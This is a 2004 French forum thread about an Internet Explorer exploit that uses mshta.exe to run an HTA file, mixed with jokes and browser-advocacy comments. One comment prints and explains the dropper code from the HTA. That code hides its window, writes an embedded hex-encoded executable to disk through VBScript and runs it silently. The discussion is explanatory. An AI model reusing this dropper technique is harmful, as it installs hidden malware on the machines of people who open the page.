Journal Nouvel exploit pour IE :

• # Re: Nouvel exploit pour IE :

  Posté par Yoan B (site web personnel) le 07 janvier 2004 à 14:21. Évalué à 2.

  

  Simple et puissant, un jour on pourra installer firebird et changer les liens pointant initialement sur IE pour qu'il executent FireBird grâce à IE lui-même. Merveilleux et merci Billou.

  • [^] # Vous connaissez l'histoire de PAF le chien ?

    Posté par jmfayard le 07 janvier 2004 à 15:04. Évalué à 4.

    

    Voici celle de PAF la clé usb, toute aussi crument logique et efficace :
    
    Alors, en 2004, pour éviter qu'Internet ne devienne vraiment de la m..., que peut-on faire, très concrètement ? Une suggestion :
    
    Jouer les Monsieur Plus des navigateurs. Tout le monde ou presque a une clé USB (ou sinon, achetez une 128Mo à 40Euros chez GrosBill[1]) et c'est très vite fait d'y installer Mozilla en Français[2], Thunderbird[3], Mozilla Firebird[4], et le plugin Flash[5]. Et au premier collègue ou membre de la famille qui se chope un virus, une pop-up ou se plaint du spam, PAF, la clé USB !. On insère gentiment la clé USB sur le port idoine, on installe le ou les logiciels qui vont bien, on glisse les deux trois avantages qui vont bien (navigation par onglet, sécurité renforcée, blocage des pop-ups ou du spam), et voilà !
    
    [1] http://grosbill.com/(...)
    [2] http://frenchmozilla.org/install/(...)
    [3] http://frenchmozilla.org/thunderbird/(...)
    [4] http://frenchmozilla.org/firebird/(...)
    [5] http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_V(...)
    
    Vu su Standblog.com, et testé sur mon grand-père de 75 ans (ça marche !)

    • [^] # Re: Vous connaissez l'histoire de PAF le chien ?

      Posté par Pierre Tramonson le 07 janvier 2004 à 15:15. Évalué à 2.

      

      Et on supprime les raccourcis IE partout où on les trouve...

• # Re: Nouvel exploit pour IE :

  Posté par xalbat le 07 janvier 2004 à 14:22. Évalué à 4.

  

  >JE comprend pas trop c'est quoi mshta.exe ni à ce qu'est censé faire poopware.hta (c'est un code bizarre)
  
  Le lien suivant devrait permettre de t'éclaircir, noter la remarque suivante :
  Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): No
  
  http://www.liutilities.com/products/wintaskspro/processlibrary/msht(...)
  
  Conclusion : ça lance la page hta passée en paramètre
  
  Pour le reste du code (le hta) rien de bien sorcier
  
  Il se planque loin de ta vue : self.MoveTo 6000,6000
  
  Ca c'est le code binaire du logiciel (potentiellement un virus que je veux lancer sur le poste client )
  t="4D,5A,44,01,05,
  [...]
  F,3F"
  
  Le code pour créer le fichier .exe, vbs de base
  
  tmp = Split(t, ",")
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set shell = CreateObject("WScript.Shell")
  poop = "fDfdfsdsfsdfssd3s343.exe"
  Set f = fso.CreateTextFile(poop, ForWriting)
  For i = 0 To UBound(tmp)
  l = Len(tmp(i))
  b = Int("&H" & Left(tmp(i), 2))
  If l > 2 Then
  r = Int("&H" & Mid(tmp(i), 3, l))
  For j = 1 To r
  f.Write Chr(b)
  Next
  Else
  f.Write Chr(b)
  End If
  Next
  f.Close
  runscr=1
  
  
  Si le tout a bien marché, je lance le virus sinon je m'arrêre discretos.
  
  
  if runscr then shell.run(poop)
  on error resume next: self.close()
  
  
  Chez moi ca marche pas parce que mon ordi est francisé, mais avec un peu de travail, ils vont bien réussir à nous faire un truc bien multilangue ... surtout avec un acces aussi simple à l'ensemble des répertoires
  Et au boulot, tjrs sous WinXP :-(

  • [^] # Re: Nouvel exploit pour IE :

    Posté par ploum (site web personnel, Mastodon) le 07 janvier 2004 à 15:09. Évalué à 1.

    

    donc le binaire, on peut y mettre ce qu'on veut dedans ?
    
    PArce que c'est vrai qu'un beau ver qui installe Firebird avec une skin IE à la place de IE, ça fait rêver :)
    
    Juste pour voir la tête des webmasters qui font des "IE only" :)

    Mes livres CC By-SA : https://ploum.net/livres.html

    • [^] # Re: Nouvel exploit pour IE :

      Posté par khalahan le 07 janvier 2004 à 18:38. Évalué à 1.

      

      Ya un post qui est passé ya qq mois qui présentait un logiciel qui faisait une sorte d'apt-get install de Firebird (ca telechargeait et peut etre installait plusieurs logiciels libres) sous Windows.
      
      Il ne reste plus qu'à mettre le code de ce programme à la place d'un virus :)
      
      Bonne continuation pour l'idée lol

  • [^] # Re: Nouvel exploit pour IE :

    Posté par plagiats le 07 janvier 2004 à 19:09. Évalué à 1.

    

    Ca c'est le code binaire du logiciel (potentiellement un virus que je veux lancer sur le poste client )
    t="4D,5A,44,01,05,
    [...]
    F,3F"
    
    tu veux dire "le code hexadecimal du bine du logiciel" ?
    
    plagiats

• # Re: Nouvel exploit pour IE :

  Posté par tene le 07 janvier 2004 à 15:27. Évalué à 3.

  

  Ca marche pas chez moi, IE me fait un access denied si c'est lancé depuis le net... lancé en local ça fonctionne évidemment.
  
  Et vu que je n'ai rien changé au droit par défaut, j'imagine que cet exploit ne fonctionne pas partout...

• # Re: Nouvel exploit pour IE :

  Posté par mammique le 07 janvier 2004 à 17:46. Évalué à 3.

  

  Pas étonnant que IE soit le navigateur le plus utilisé au monde si il est le seul capable de réaliser autant d'exploits !

  • [^] # Re: Nouvel exploit pour IE :

    Posté par Franck le 08 janvier 2004 à 08:32. Évalué à 1.

    

    Rien à voir avec ton post mais le lien associé à ton nom est l'association de deux urls... bizarre... c'est sans doute lié au fait que ton url (www.menagerie.com) ne comporte pas de http devant, mais la source de la page a l'air clean...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.